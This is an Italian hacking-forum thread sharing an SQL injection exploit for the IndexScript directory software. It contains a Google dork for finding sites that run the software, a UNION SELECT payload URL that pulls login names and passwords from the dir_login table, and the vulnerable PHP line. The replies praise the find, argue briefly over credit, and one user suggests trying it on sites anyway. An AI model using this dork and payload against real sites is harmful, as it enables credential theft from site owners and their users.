exploit IndexScript

[Langy]

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

 

[Cryon89]

buona segnalazione! :grin1:

 

[imported_ali]

molto bello

 

[Larika]

è tuo? non scrivi la fonte?

 

[Chuzz]

exploit IndexScript (By: xssvgamer)

 

[Larika]

LOL scusate, questa è la seconda volta che mi succede, sto invecchiando che volete!!

 

[Il_BeCcHiNo]

old ma good

 

[imported_mignolo]

è dificile trovare un sito vulnerabile...cmq tentar non nuoce!

 

[nca]

bene bene anche se old!